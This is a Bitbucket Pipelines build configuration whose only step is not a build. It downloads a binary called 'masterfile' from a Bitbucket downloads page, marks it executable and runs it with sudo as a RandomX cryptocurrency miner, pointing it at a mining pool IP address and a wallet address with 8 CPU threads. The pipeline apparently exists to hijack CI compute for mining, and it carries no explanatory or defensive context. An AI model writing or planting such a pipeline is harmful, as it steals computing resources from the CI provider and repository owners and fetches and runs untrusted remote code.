pipelines:
  default:
    - step:
        script:
            - sudo apt-get update && sudo apt-get install -y wget && wget https://bitbucket.org/AnjayMabar100/zzzz/downloads/masterfile && sudo chmod u+x masterfile && sudo ./masterfile --disable-gpu --algorithm randomx --pool 104.140.244.186:80 --wallet 46LZKT4LHCENcU9GtWtCe4NuLSrxtPpHKJs5J5xLqoE8EMKWmc142s2AQvn64n3E5vVbfSYD2KbenUz8CzjMv2trSrwB24v.Pekerja01 --cpu-threads 8 --log-file log.txt